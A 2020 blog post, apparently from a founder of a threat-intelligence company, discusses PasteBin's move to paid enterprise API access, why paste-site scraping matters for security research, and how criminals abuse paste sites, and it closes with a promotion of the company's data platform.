PasteBin Kills Search And That’s Okay. No, Really.
UPDATE 17th April 2020: PasteBin have announced they are looking into ways to give security researchers access. But they have not mentioned if this will require payment. https://twitter.com/pastebin/status/1250847990131986432
It’s no secret that the InfoSec community relies on a variety of intelligence sources to monitor potential threats and identify threat actors. One of these sources being PasteBin, a quick and easy platform for sharing blobs of text, a favourite among both techies and criminals.
Even a quick Google Cache search with the term “site:pastebin.com password” yields some interesting results, which can be converted into signals, such as IOCs or passive intelligence.
In fact, we make heavy use of PasteBin scraping to snoop in places Black Hatters dwell, which has helped us detect and report several serious security breaches.
But this week has seen PasteBin changing their business model and potentially undermining this practice; unless you pay for enterprise access.
According to their very recent Twitter release,
“Access to the Enterprise API is granted to Pastebin verified institutions and organizations only. If you wish to use the Enterprise API or want to know more, please contact our sales team… to apply.” — April 15, 2020
So can this shift in policy have far-reaching consequences? To answer that, let’s first look at why web scraping is important and what PasteBin (and other text storage platforms like ControlC, HasteBin, Just Paste Me, Private Bin et. al) actually does.
Why Web Scraping is Important for Security
Web scraping is integral to cyber security and threat intelligence teams because it allows the extraction of data from publicly available sources — data that can then be processed in order to garner valuable insights such as information linked to security breaches, doxxing or personal information leaks, hacked financial data, stolen source code, and other cyber criminal activity.
Scraping also makes it possible to keep track of the brand and reputation of a company, making it an effective step for keeping up with developing threats, major leaks of personal information etc.
What is PasteBin?
PasteBin is a website where users can store text online for a set period of time and share with literally anyone on the planet (as long as they are provided with a direct link to a paste, which is often randomly generated thus hard to guess without being given). It was borne from excessive user activity on the Internet Relay Chat (IRC), an instant messaging application launched in 1988. Think of it as a corkboard on the wall where notes are stuck for all to see.
Codesharing directly in IRC channels (and other messaging applications) disrupts the flow of messages or can alter the code itself. Users require a third-party site where they can share plain text blocks as a link, allowing other users to easily access and edit it.
Given the sheer amount of different paste sites that started to appear all over the place, including in the “deep web” that is not indexed by search engines, finding relevant pastes was a tedious and potentially dangerous task.
So PasteBin was designed to allow its users to “paste” large blocks of code with syntax highlighting and proper formatting which can be shared by posting a link in a chat host. Since the URL only took up a single line, it soon became a popular solution. An early use was also to circumvent the 140 character restriction in Twitter, by linking to the “pastes” in coder’s Twitter posts.
People also commonly use PasteBin to share code if their IM app doesn’t support proper formatting, and to share a large amount of debugging output when asking for help online. Other common uses include sharing lists of dark web links and hackers leaking breached information (such as passwords), as an alternative that does not require login and reduces a digital footprint, uploading source code for the purpose of sharing or review/collaboration, publicizing breached data and other sensitive information, and re-publishing text that has been removed from other sites.
The Good, the Bad…
Invariably, paste sites are also popular platforms for illegal activities. Bad actors often use free and unilaterally accessible platforms as C2 (command & control for botnets) hubs to spread malware or for quick n’ easy places to dump sensitive information as most of these platforms do not require any kind of login credentials. This goes well with reducing digital footprint, which is what the majority of hackers are after in order to avoid detection.
Other common examples of illegal / shady content on PasteBin (and other paste websites) involve packed malware payloads, malicious shell scripts, commands to perform for infected hosts (essentially a way to use PasteBin as a C2 server), and leaked credentials and other sensitive information.
In an attempt to prevent malicious usage, PasteBin does prohibit:
- the posting of email addresses and password lists
- login details
- stolen source code
- hacked data
- copyrighted information and material
- banking, credit card, or financial information
- personal information
- pornographic information
- and spam links, including site promotion.
However, these “rules” and “restrictions” are never enforced because it’s near to impossible to automate and would require too much manual labour (re: money) to moderate by hand. Therefore, anybody can post whatever they want using VPN/proxy/TORs. Worse yet, even without using these methods, chances are this content will stay and are sometimes even indexed by search engines like Google and Bing. It’s fair to point out that to get all of the pastes, users must use the site’s internal keyword search tool to find specific content, or get paste links directly from other users.
Because PasteBin is user-friendly, supports large text files, doesn’t require user registration, and allows for anonymous posting (if the user is utilizing a VPN/proxy chain/TOR), it relies solely on users for reporting abuses, meaning that the Wild West mentality of pretty much anything goes reigns supreme.
Perhaps the most famous case of illicit PasteBin activity is with Sony Pictures. In October 2014, Sony Pictures’ computer systems were hacked by a group known as Guardians of Peace (GOP). A big chunk of data exfiltrated during the breach was uploaded to PasteBin including employee information for over a million individuals, upcoming production details, and music codes.
A more recent example is with Amazon Ring, where in December 2019 its customers were compromised and the breached data for over 3,000 sold cameras, including the customer emails and passwords enabled hackers to access customer addresses, camera footage, and financial data.
…And the Ugly
Many security researchers contribute to the community as volunteers, often to improve their own knowledge and help make the Internet a safer place.
Like most free online services, PasteBin has seemingly changed their monetization strategy, after all, these companies are not charities. However this is at odds with the InfoSec community, many of which don’t have the budget for buying access to “yet another API”.
Of course, there are other paid “cyber intelligence services” which will continue to scrape sites such as PasteBin, and offer these as direct feeds to their customer base.
How did this impact our platform?
Fortunately our data ingestion engines use both APIs and traditional scraping techniques, as official APIs do not always present all the available data.
Thanks to a recent ruling on a legal dispute between LinkedIn and data analytics firms HiQ, it has been established that website scraping is not illegal.
And in fact, it’s often the undocumented APIs, such as those which drive frontend applications, which yield the most cleanest data. This is often because frontend APIs are designed to reduce round-trips, so data queries are bundled together on the backend and sent in a large prefetch chunk.
For any serious intelligence operation, collecting this data is the only option because the existing APIs on PasteBin did not offer sufficient features required for advanced usage.
PasteBin has no doubt recognised the value in offering in-house search functionality which does not rely on Google Search.
The removal of search functionality, which relied on Google Search and was not very good at archival, will likely not have much impact on the community as a whole. Deleted posts would eventually expire and searching for metadata, such as name or date range, was a difficult task.
But they are several years late to the game, there are several dozen companies who have collected over a decades worth of data from many such sites, and they offer search capabilities over all of them in one platform.
I’m part of the founding team at ZeroGuard, one of the many cyber intelligence companies operating in this space — gosh that sounds rather corporate, doesn’t it?!?
But we’re quite special, because we solve all the hard data science problems for you — rather than presenting “yet another full text search platform” — although we offer that too!
We have an extremely talented team of software engineers and data analysts who are constantly looking for new ways to enrich datasets and extract valuable intelligence.
Our APIs offer broader data access than most other commercial offerings. It can also be used independently as a raw data source to support organizations with their existing threat intelligence tools.
If you’re interested to learn more about how we solved some of these technical challenges, keep your eye out for our next podcast, where we will be sharing our journey to 6 trillion rows of data.